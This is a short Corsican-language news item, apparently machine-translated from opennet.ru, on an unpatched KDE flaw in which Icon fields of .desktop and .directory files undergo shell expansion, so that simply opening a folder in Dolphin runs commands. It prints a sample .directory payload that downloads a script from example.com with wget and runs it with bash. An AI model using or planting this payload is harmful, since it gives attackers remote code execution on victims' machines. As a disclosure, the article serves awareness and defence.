Vulnerabilità di esecuzione di codice KDE quandu vede una lista di schedari

In KDE identificatu vulnerabilità, chì permette à un attaccu di eseguisce cumandamenti arbitrarie quandu un utilizatore vede un repertoriu o un archiviu chì cuntene i fugliali ".desktop" è ".directory" apposta apposta. Un attaccu richiede chì l'utilizatore simpricimenti vede una lista di fugliali in u gestore di file Dolphin, scaricate un schedariu di desktop maliziusu, o trascinate un shortcut in u desktop o in un documentu. U prublema si manifesta in a versione attuale di biblioteche Scrivendu di KDE 5.60.0 è versioni più vechje, finu à KDE 4. A vulnerabilità hè sempre ferma senza currettu (CVE micca assignatu).

U prublema hè causatu da una implementazione incorrecta di a classa KDesktopFile, chì, durante a trasfurmazioni di a variàbile "Icona", senza scappamentu propiu, passa u valore à a funzione KConfigPrivate::expandString(), chì esegue l'espansione di caratteri speciali di shell, cumpresa a trasfurmazioni. i strings "$(..)" cum'è cumandamenti per esse eseguitu. Cuntrariu à i requisiti di a specificazione XDG, implementazione divulgazione custruzzioni di cunchiglia sò pruduciuti senza separà u tipu di paràmetri, i.e. micca solu quandu si determina a linea di cummanda di l'applicazione per esse lanciata, ma ancu quandu si specifica l'icone affissate per difettu.

Per esempiu, per attaccà basta mandate à l'utilizatore un archiviu zip cun un repertoriu chì cuntene un schedariu ".directory" cum'è:

[Entry Desktop] Tipu = Directory
Icona[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

Quandu pruvate di vede u cuntenutu di l'archiviu in u gestore di file Dolphin, u script https://example.com/FILENAME.sh serà scaricatu è eseguitu.


Source: opennet.ru

Add a comment